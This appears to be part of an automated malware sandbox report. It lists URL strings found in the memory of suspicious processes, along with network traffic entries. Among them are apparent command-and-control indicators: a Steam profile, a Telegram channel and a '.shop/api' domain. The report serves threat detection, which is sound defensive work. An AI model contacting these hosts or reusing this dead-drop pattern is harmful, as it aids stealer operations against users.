Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: HIJJEG.12.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://java.co
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?go
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wish
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JKEBFB.12.dr	String found in binary or memory: https://support.mozilla.org
Source: JKEBFB.12.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: JKEBFB.12.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwin
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/D
Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/H
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/apiF
Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/n
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1406666637.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398671914.000000001E434000.00000004.00000020.00020000.00000000.sdmp, JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 53098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53089
Source: unknown	Network traffic detected: HTTP traffic on port 53107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53094
Source: unknown	Network traffic detected: HTTP traffic on port 53089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53099
Source: unknown	Network traffic detected: HTTP traffic on port 53100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53098
Source: unknown	Network traffic detected: HTTP traffic on port 53085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53091
Source: unknown	Network traffic detected: HTTP traffic on port 53112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53066
Source: unknown	Network traffic detected: HTTP traffic on port 53088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53108
Source: unknown	Network traffic detected: HTTP traffic on port 53111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53068
Source: unknown	Network traffic detected: HTTP traffic on port 53101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53107
Source: unknown	Network traffic detected: HTTP traffic on port 53105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53104
Source: unknown	Network traffic detected: HTTP traffic on port 53109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53074
Source: unknown	Network traffic detected: HTTP traffic on port 53114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53113
Source: unknown	Network traffic detected: HTTP traffic on port 53104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53111
Source: unknown	Network traffic detected: HTTP traffic on port 53086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53087
Source: unknown	Network traffic detected: HTTP traffic on port 53082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53085

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
